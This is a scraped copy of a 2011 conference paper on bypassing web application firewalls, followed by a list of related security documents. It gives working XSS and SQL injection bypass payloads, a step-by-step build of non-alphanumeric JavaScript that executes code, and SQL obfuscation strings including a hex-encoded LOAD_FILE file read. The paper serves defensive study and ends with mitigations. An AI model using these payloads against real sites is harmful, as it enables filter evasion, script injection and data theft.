1 Web Application Firewalls implementations, common problems and vulnerabilities
|
|
- Esther Cross
- 8 years ago
- Views:
Transcription
1 Bypassing Web Application Firewalls Pavol Lupták CEO, Nethemba s.r.o Abstract The goal of the presentation is to describe typical obfuscation attacks that allow an attacker to bypass standard security measures such as various input filters, output encoding mechanisms used in web-based intrusion detection systems (IDS), intrusion prevention systems (IPS) and web application firewalls (WAFs). These attacks may include different networking tricks, polymorphic shellcode and various code techniques. At the beginning we analyse and compare different HTML parsing and interpretation approaches used by most-common browsers that can lead to unique attack vectors. Javascript, with a full range of features, represents another effective way that can be used to obfuscate or de-obfuscate code some existing obfuscation tools are mentioned. We describe how it is possible to construct non-alphanumeric Javascript code which does not contain alphabetic or numeric characters, but still can contain malicious executable code. Despite the fact that most current applications are immune to SQL injection attacks, it is still possible to find many vulnerable applications. We focus on different fuzzy techniques (and useful open source SQL injection tools that implement them) which can still be used to bypass weak input validation controls. We conclude our presentation with a demonstration of the most basic obfuscation techniques that can be successfully used to bypass traditional web application firewalls (WAFs). Finally, we briefly describe current mitigation techniques that are recommended for efficient malicious Javascript code analysis and sanitizing user input containing untrusted code. Keywords: WAF, IPS, IDS, obfuscation, SQL injection, XSS, CSS, CSRF. 1 Web Application Firewalls implementations, common problems and vulnerabilities 1.1 What is a Web Application Firewall (WAF)? According to the OWASP definition[1]: A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified. Web Application Firewalls (WAFs) were emerged from IDS/IPS systems that were specifically focused on HTTP protocol and HTTP related attacks. They usually contain a lot of complex regular expression rules that match most known input/output validation attacks. Especially commercial ones support extra features like cookie encryption, transparent CSRF protection etc. Except of free mod_security[2], PHPIDS[3] and AQTRONIX[4] they are quite expensive and often there is no correlation between their price and their filtering capabilities. Security and Protection of Information
2 Choosing the right WAF is not easy, but there are at least two documents that can be helpful in this process using Best Practices: Use of Web Application Firewalls and/or the Web Application Firewall Evaluation Criteria. 1.2 Common WAF implementations Web Application Firewalls are usually deployed in so called blacklisting mode which is much more vulnerable to bypasses and targeted attacks. Blacklisting according to the OWASP definition[5] means Reject known bad : This strategy, also known as negative or blacklist validation is a weak alternative to positive validation. Essentially, if you don't expect to see characters such as %3f or JavaScript or similar, reject strings containing them. This is a dangerous strategy, because the set of possible bad data is potentially infinite. Adopting this strategy means that you will have to maintain the list of known bad characters and patterns forever, and you will by definition have incomplete protection. A more secure strategy is Whitelisting. According to the OWASP definition[6], it means Accept known good : This strategy is also known as whitelist or positive validation. The idea is that you should check that the data is one of a set of tightly constrained known good values. Any data that doesn't match should be rejected. Data should be: Strongly typed at all times Length checked and fields length minimized Range checked if a numeric Unsigned unless required to be signed Syntax or grammar should be checked prior to first use or inspection In whitelisting mode for WAF configuration it is necessary to know an application context (i.e. type of all allowed inputs for all forms) which can be quite handy yet difficult to obtain, especially in the case of huge web applications. Despite the fact that the blacklisting approach is vulnerable to bypasses and targeted attacks, a web application firewall can still be a cost-effective security solution, especially when a customer has no control over his protected application (the supplier does not provide the application security updates anymore or the customer has no access to the application's source code). It is necessary to emphasize that a WAF is just workaround, not a 100% secure replacement for a secure application that correctly validates all user input and output. 1.3 WAF filter rules WAF filter rules directly reflect WAF effectiveness. Unfortunately, for most WAF vendors, they are closely guarded secrets[7] that follow the Security through obscurity concept [8]: Security through (or by) obscurity is a pejorative referring to a principle in security engineering, which attempts to use secrecy (of design, implementation, etc.) to provide security. A system relying on security through obscurity may have theoretical or actual security vulnerabilities, but its owners or designers believe that the flaws are not known, and that attackers are unlikely to find them. A system may use security through obscurity as a defense in depth measure; while all known security vulnerabilities would be mitigated through other measures, public disclosure of products and versions in use makes them early targets for newly discovered vulnerabilities in those products and versions. An attacker's first step is usually information gathering; this step is delayed by security through obscurity. The technique stands in contrast with security by design, although many real-world projects include elements of both strategies. 80 Security and Protection of Information 2011
3 Most determined attackers are able to bypass these rules even without seeing them. Open-source WAFs (mod_security, PHPIDS) have open-source rules, which is beneficial due to the added public scrutiny by skilled penetration testers. Blocked Attack Undetected modification 'or 1=1-- ' or 2=2-- alert(0) <script>alert(0)</script> ' or ''''='r <script>alert(0)</script> <img src=x:x onerror=alert(0)//></img> %00alert(0) <script type=vbscript>msgbox(0)</script> '/**/OR/**/''''=' <img src= x:x onerror= alert(0) ></img> <img src= onload=alert(0)//></img> 1 or 1=1 (1)or(1)=(1) eval(name) x=this.name X(0?$:name+1) Table 1: Typical WAF bypasses. 1.4 WAF vulnerabilities Although WAF is considered to be a network element that significantly increases the overall security of customer applications, WAF can also increase the attack surface of a target organization. WAF may be the target of and vulnerable to malicious attacks, e.g. XSS, SQL injection, denial-of-service attacks, and remote execution vulnerabilities [14]. Increased complexity of any application usually also increases the number of its potential vulnerabilities and this is also the case of security products including WAFs. 2 Bypassing Web Application Firewalls In the following section we describe how a typical bypass flow looks like and how it is possible to make javascript and SQL obfuscation code including practical composition of non-alphanumeric javascript code. 2.1 Typical bypass flow Typical bypass flow for the determined attacker can be described in the following 4 steps: 1. Find out which characters or sequences are allowed by WAFs HTTP response codes are useful for revealing which characters or sequences can be included in the target GET/POST requests. Security and Protection of Information
4 2. Make an obfuscated version of your injected payload Making the obfuscated version of the injected payload may require a deep knowledge of Javascript or SQL language. Be aware that the obfuscated version can be much longer than the original one. If there is no GET/POST parameter size limit, this should not be a problem. 3. Test it and watch for the WAF/application response It is necessary to carefully check which injected characters or sequences are accepted by the application and passed to the web application firewall. Analysing WAF/application responses will reveal which characters or sequences can bypass the given WAF or application validation filter. 4. If it does not bypass, modify your payload and repeat step Javascript obfuscation Javascript is a very dynamic, expressive and loosely typed language that has powerful features. Javascript payload is used in XSS attack vectors. For obfuscation, Javascript supports many useful functions: evals (possibility to evaluate any expression), expression closures (something similar to a typical Lambda notation), e.g.: (function() alert(1)) () (function($)$(1)) (alert) generator expressions, e.g.: for ([]in[$=alert])$(2) $=[(alert)for([]in[0])][0],$(1) iterators (an object that knows how to access items from a collection one at a time, while keeping track of its current position within that sequence), e.g: Iterator([$=alert]).next()[1],$(1) special characters and shortcuts. Javascript also supports various encoding types (unicode multibyte characters, hexadecimal, octal, or any combination of these) and encryption functions (e.g. XOR, BASE64). 2.3 Non-alphanumeric Javascript code In the following example, we will show a situation where the given WAF blocks alpha characters and numbers (probably not a realistic situation, but this is a proof-of-concept). Depending on blocked characters and its number, in many cases it is still possible to make fully functional obfuscated code without using these characters. We consider the situation where only a few special characters like (){}_=[];$!+<> are allowed. Let's summarize the current possibilities of the Javascript language: we can use numbers to obtain a single character in a string, e.g. for abc string, index zero for accessing the first character - abc[0] we can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement ( ) 82 Security and Protection of Information 2011
5 we know that mathematical operators perform automatic numeric conversion we know that string operators perform automatic string conversion As a good source of different alphanumeric characters we can use various predefined Javascript objects or error codes, e.g.: Javascript objects / error states {}+'' String result [object Object] +[][+[]] NaN [][+[]]+'' undefined [![]]+[] false [!![]]+[] true Table 2: Source of strings from javascript objects / error states. Most of these Javascript objects or error codes can be invoked without using alphanumeric characters. In order to obtain just one character, we need to use numerical index. If we do not want to use numbers, we need to find an alternative way for their representation without using any alphanumeric characters. Characters Result +[] 0 +`'` 0 + ' 0 -[] 0 -`'` 0 - ' 0 Table 3: The shortest possible methods to create zero without using numbers. As we can see, mathematical operators + or convert an empty string to 0. Now that we have the number zero, we can generate other numbers like 1, 2, 3, etc. using Javascript's automatic conversion behavior: Possible obfuscation string Possible obfuscation string Result +[] +[] 0 ++[[]][+[]] +!+[] 1 Security and Protection of Information
6 ++[++[[]][+[]]][+[]]!+[]+!+[] 2 ++[++[++[[]][+[]]][+[]]][+[]]!+[]+!+[]+!+[] 3 Table 4: Obfuscated ways to generate numbers. In a similarly recursive way, we can generate any arbitrary number Generating the 'alert' string without using any alphanumeric characters In order to generate the letter 'a', we can use the error message NaN, which means Not a Number by accessing an empty string with index '0' we get the state 'undefined' and then convert it to the number - we get the state 'NaN': +[][+[]] // result: NaN When we access this string using the first index (we are interested in the first character) we directly access the letter 'a' - NaN[1]='a'. ++[[]][+[]] // returns number 1 +[][+[]]+[] // result string: NaN NaN[1]=(+[][+[]]+[])[++[[]][+[]]] = 'a' //we have character 'a' Generating the 'l' character is pretty straight-forward. 'l' is used e.g. in boolean false. We use a blank array (string), apply the NOT (!) operator to obtain boolean, wrap it with [] to convert it to the string: [![]]+[] //string false ++[++[[]][+[]]][+[]] //2 false[2]=([![]]+[])[++[++[[]][+[]]][+[]]]='l' //we have character 'l'. For generating the 'e' character we can use boolean true and obtain the third letter: ([!![]]+[]) // string 'true' ++[++[++[[]][+[]]][+[]]][+[]] //3 true[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] //we have character 'e' 'r' and 't' characters can be generated in a very similar way by obtaining the first and second letter of the 'true' string: ([!![]]+[]) // string 'true' +[] //0 ++[[]][+[]] //1 true[1] = ([!![]]+[])[++[[]][+[]]] //we have character 'r' true[0] = ([!![]]+[])[+[]] //we have character 't' And finally we have our 'alert' string: (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]] 84 Security and Protection of Information 2011
7 2.3.2 Executing the code of our choice In order to execute arbitrary Javascript code we need to gain the window object to access all of its properties. If we can access this object, we can call the Function constructor to execute our arbitrary code. Probably the shortest possible way to gain access to the window object is in the following way: alert((1,[].sort)()) // show our window object! alert((1,[].reverse)() // show our window object! (longer version) Function sort leaks the window object. This is a real security problem - window objects shouldn't leak! They can break sandboxes and create obfuscation vectors. Thankfully, ECMA5 recognizes this and a future version of Javascript will not leak window in this way[7]. When Javascript loses a reference to the current object that a function was called on, it reverts to the global object (window). The sort and reverse techniques start with a reference to a standard array literal. Then, instead of calling the object and then the method, we simply store a reference to the method in another variable. Thus, the window is returned when the method is called as the array literal has been lost[7]. So let's generate alert((1.[].sort)()). We know how to generate the string 'alert', so now we need to generate the 'sort' string. We can obtain the character 's' from the false boolean: false[3]=([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // character 's' In a similar way we can obtain the character 'o' from []+{} (the concatenation of an object literal and string returns the string [object Object], consequently we obtain the first alpha character): ([]+{})[++[[]][+[]]] //character 'o' We have already generated the 'r' and 't' letters, so the final 'sort' is: ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+( [!![]]+[])[+[]] Once we have the window object, we can use our 'alert' string to call the function by accessing the method and parsing our string: (1,[].sort)().alert(1) after changing number 1 and characters 's','o','r','t','a','l','e','r','t' to their obfuscated version we finally get: ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][ +[]]]+([!![]]+[])[+[]]])()[ (+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]]) which fully works and calls alert(1)! We have used the static method alert of the object window, but we would like to have a more universal way to evaluate and execute any arbitrary Javascript code. Using the array constructor, we can execute our arbitrary code in the following way (accessing the constructor twice from an array object returns Function): [].constructor.constructor( alert(1) )() // call function and execute alert(1) or any other javascript function Security and Protection of Information
8 To call this function we need to generate the additional 'c', 'n','u' characters (we have already have the 'o','s','t','r' characters). We can use the output of [].sort function: function sort() { [native code] } and use the above-mentioned methods to gain all necessary characters. The website Sla.ckers.org was responsible for diminutive Non-Alphanumeric Javascript Contest [9] - its goal was to write the shortest possible non-alphanumeric Javascript code. The winning code 63 bytes long from LeverOne: ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á) 2.4 SQL obfuscation SQL obfuscation can help the attacker to bypass web and database application firewalls (e.g. GreenSQL[10]) or applications' input validation controls. Different DBMS' (Database Management Systems) have different SQL syntax (e.g. Oracle SQL does not have the LIMIT directive like MySQL or PostgreSQL), but most of them support Unicode, BASE64, hexadecimal, octal and binary representations, escaping and hashing algorithms like MD5 or SHA-1. SQL obfuscation strictly depends on the type of DBMS used. Many DBMS with PHP still support stacked queries (e.g. PostgreSQL or MSSQL) - so in the case of a SQL injection vulnerability, the attacker can add his own stacked SQL command. MySQL is not affected, however if an application uses the PHP Data Objects (PDOs) connection library instead of PHP MySQL or MySQLi, MySQL will accept stacked queries. The PDO engine is capable of separating multiple queries and executing them sequentially. In some DBMS', many blacklisted characters can be replaced by their (same-functional) alternatives, e,g. space (0x20) can be replaced by 0xA0 in MySQL. Comments can be also a good method of obfuscation sometimes it is really difficult to determine, from the web or database application firewall, what is a comment and what is not, e.g.: s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1 Obfuscation examples using hexadecimal and binary representations: SELECT CONCAT (char (x' ',b' ')) SELECT LOAD_FILE(0x633A5C626F6F742E696E69) SELECT (extractvalue(0x3c613e61646d696e3 C2F613, 0x2F61)) New versions of MySQL and PostgreSQL also support XML functions that can be inadvertantly used for the obfuscation: SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv'); HTML5 (partially supported by Chrome or Opera) supports local DB storage (SQLite 3.1+) using the opendatabase object that can possibly (in the future) be misused for persistent XSS or local SQL injection attacks. There are many public SQL injection cheat-sheets that describe various obfuscation techniques (e.g. Ferruh Mavituna cheat sheet[11]). 86 Security and Protection of Information 2011
9 3 Summary Despite the fact that Web Application Firewalls are becoming more advanced and sophisticated, it is necessary to understand that they are just workarounds. The ultimate solution is to rely on security in every SDLC phase and strictly validate all input and output in the application. Using whitelisting is definitely a better idea than using blacklisting (both in the application and WAF). In the case of security-critical applications it is recommended to use 3 rd layer database architecture (when the application has no direct access to the database and has to use special database access functions, and/or database firewalls that work on the database application layer (e.g. GreenSQL[10]). All SQL requests should always be constructed as prepared statements (structured queries) in order to avoid dangerous SQL injection attacks. For HTML validation against XSS attacks, we recommend to use external verified libraries with good reputations (e.g HTML Purifier[12] for PHP or OWASP AntiSamy[13] for Java). References [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes, David Lindsay: Web Application Obfuscation, 2011 [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] Existing obfuscation tools [ 16 ] Hackvertor [ 17 ] HackBar [ 18 ] Malzilla [ 19 ] Your imagination Security and Protection of Information
10 Special thanks [ 20 ] Samy Kamkar for corrections [ 21 ] Mario Heiderich and Stefano Di Paola for personal consultations 88 Security and Protection of Information 2011
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Nethemba All About Security Highly experienced certified IT security experts (CISSP, C EH, SCSecA) Core
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationIntrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
More informationXSS Lightsabre techniques. using Hackvertor
XSS Lightsabre techniques using Hackvertor What is Hackvertor? Tag based conversion tool Javascript property checker Javascript/HTML execution DOM browser Saves you writing code Free and no ads! Whoo hoo!
More informationEVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS
EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS SEPTEMBER 2015 MAZIN AHMED MAZIN@MAZINAHMED.NET @MAZEN160 Table of Contents Topic Page Number Abstract 3 Introduction 3 Testing Environment 4 Products
More informationInput Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum
Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations Marco Morana & Scott Nusbaum Cincinnati Chapter September 08 Meeting Copyright 2008 The Foundation Permission is granted to copy,
More informationDetecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework ajin25@gmail.com keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
More informationWeb Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationCross Site Scripting Prevention
Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya
More informationDetect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia
More informationFinding XSS in Real World
Finding XSS in Real World by Alexander Korznikov nopernik@gmail.com 1 April 2015 Hi there, in this tutorial, I will try to explain how to find XSS in real world, using some interesting techniques. All
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationStill Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
More informationCheck list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
More informationCyber Security Challenge Australia 2014
Cyber Security Challenge Australia 2014 www.cyberchallenge.com.au CySCA2014 Web Penetration Testing Writeup Background: Pentest the web server that is hosted in the environment at www.fortcerts.cysca Web
More informationSQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd
SQL injection: Not only AND 1=1 Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd bernardo.damele@gmail.com +44 7788962949 Copyright Bernardo Damele Assumpcao Guimaraes Permission
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationBlackbox Reversing of XSS Filters
Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net Introduction Web applications are the future Reversing web apps blackbox reversing very different environment and tools Cross-site scripting
More informationClient vs. Server Implementations of Mitigating XSS Security Threats on Web Applications
Journal of Basic and Applied Engineering Research pp. 50-54 Krishi Sanskriti Publications http://www.krishisanskriti.org/jbaer.html Client vs. Server Implementations of Mitigating XSS Security Threats
More informationWeb Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
More informationAbusing Internet Explorer 8's XSS Filters
Abusing Internet Explorer 8's XSS Filters by Eduardo Vela Nava (http://twitter.com/sirdarckcat, sird@rckc.at) David Lindsay (http://twitter.com/thornmaker, http://www.cigital.com) Summary Internet Explorer
More information1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
More informationUniversal XSS via IE8s XSS Filters
Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides: http://p42.us/ie8xss/ About Us Eduardo Vela Nava aka sirdarckcat http://sirdarckcat.net http://twitter.com/sirdarckcat
More informationCSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationSecurity vulnerabilities in new web applications. Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Security vulnerabilities in new web applications Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant $whoami Introduction Pavol Lupták 10+ years of practical experience in security and seeking vulnerabilities
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationSQL Injection Optimization and Obfuscation Techniques
SQL Injection Optimization and Obfuscation Techniques By Roberto Salgado Introduction SQL Injections are without question one of the most dangerous web vulnerabilities around. With all of our information
More informationCriteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More informationFinding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.
Finding Your Way in Testing Jungle A Learning Approach to Web Security Testing. Research Questions Why is it important to improve website security? What techniques are already in place to test security?
More informationColumbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
More informationWe protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013
We protect you applications! No, you don t Digicomp Hacking Day 2013 May 16 th 2013 Sven Vetsch Partner & CTO at Redguard AG www.redguard.ch Specialized in Application Security (Web, Web-Services, Mobile,
More informationInformation Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
More informationContemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited
Contemporary Web Application Attacks Ivan Pang Senior Consultant Edvance Limited Agenda How Web Application Attack impact to your business? What are the common attacks? What is Web Application Firewall
More informationWeb-Application Security
Web-Application Security Kristian Beilke Arbeitsgruppe Sichere Identität Fachbereich Mathematik und Informatik Freie Universität Berlin 29. Juni 2011 Overview Web Applications SQL Injection XSS Bad Practice
More informationWebapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationApplication security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
More informationHTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
More informationWeb Application Firewall Bypassing
Web Application Firewall Bypassing how to defeat the blue team KHALIL BIJJOU CYBER RISK SERVICES DELOITTE 29 th Octobre 2015 STRUCTURE Motivation & Objective Introduction to Web Application Firewalls Bypassing
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationSecurity Assessment of Waratek AppSecurity for Java. Executive Summary
Security Assessment of Waratek AppSecurity for Java Executive Summary ExecutiveSummary Security Assessment of Waratek AppSecurity for Java! Introduction! Between September and November 2014 BCC Risk Advisory
More informationInteractive Application Security Testing (IAST)
WHITEPAPER Interactive Application Security Testing (IAST) The World s Fastest Application Security Software Software affects virtually every aspect of an individual s finances, safety, government, communication,
More informationThe Past, Present and Future of XSS Defense Jim Manico. HITB 2011 Amsterdam
The Past, Present and Future of XSS Defense Jim Manico HITB 2011 Amsterdam 0 Jim Manico Managing Partner, Infrared Security Web Developer, 15+ Years OWASP Connections Committee Chair OWASP ESAPI Project
More informationProtecting Your Organisation from Targeted Cyber Intrusion
Protecting Your Organisation from Targeted Cyber Intrusion How the 35 mitigations against targeted cyber intrusion published by Defence Signals Directorate can be implemented on the Microsoft technology
More informationImplementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
More informationExternal Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
More informationImplementation of Web Application Security Solution using Open Source Gaurav Gupta 1, B. K. Murthy 2, P. N. Barwal 3
Implementation of Web Application Security Solution using Open Source Gaurav Gupta 1, B. K. Murthy 2, P. N. Barwal 3 ABSTRACT 1 Project Engineer, CDACC-56/1, Sector-62, Noida, 2 Executive Director, CDACC-56/1,
More informationStandard: Web Application Development
Information Security Standards Web Application Development Standard IS-WAD Effective Date TBD Email security@sjsu.edu # Version 2.0 Contact Mike Cook Phone 408-924-1705 Standard: Web Application Development
More informationHow To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
More informationCracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference
Cracking the Perimeter via Web Application Hacking Zach Grace, CISSP, CEH zgrace@403labs.com January 17, 2014 2014 Mega Conference About 403 Labs 403 Labs is a full-service information security and compliance
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationPlaying with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
More informationVIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso
VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES AUTHOR: Chema Alonso Informática 64. Microsoft MVP Enterprise Security Hello and welcome to Intypedia.
More informationEVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
More informationEC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.
CENTER FOR ADVANCED SECURITY TRAINING 619 Advanced SQLi Attacks and Countermeasures Make The Difference About Center of Advanced Security Training () The rapidly evolving information security landscape
More informationWeb Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
More informationInstitutionen för datavetenskap
Institutionen för datavetenskap Department of Computer and Information Science Final thesis Generating web applications containing XSS and CSRF vulnerabilities by Gustav Ahlberg LIU-IDA/LITH-EX-A--14/054--SE
More informationChapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
More informationWeb Application Firewall Profiling and Evasion. Michael Ritter Cyber Risk Services Deloitte
